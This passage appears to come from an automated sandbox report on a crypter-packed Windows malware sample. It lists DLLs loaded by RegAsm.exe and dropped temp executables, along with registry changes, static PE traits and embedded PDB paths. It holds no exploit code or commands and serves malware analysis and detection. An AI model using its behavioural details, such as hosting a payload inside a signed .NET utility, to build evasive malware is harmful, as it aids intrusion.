Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Section loaded: sfc_os.dll
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll
Source: C:\Windows\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nikko Video Compressor_is1

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static file information: File size 2457088 > 1048576

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x236c00

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: .Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb# source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.PDBecti source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a42sr32\win32_x86\release\pdb\UniverseDesigner\designer.pdb source: h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000000.1616062018.0000000000525000.00000002.00000001.01000000.00000011.sdmp, h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000002.2155515118.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\day2_mixApp.pdbk source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PE.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\hSHxNXg.pdb source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.2154371709.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp
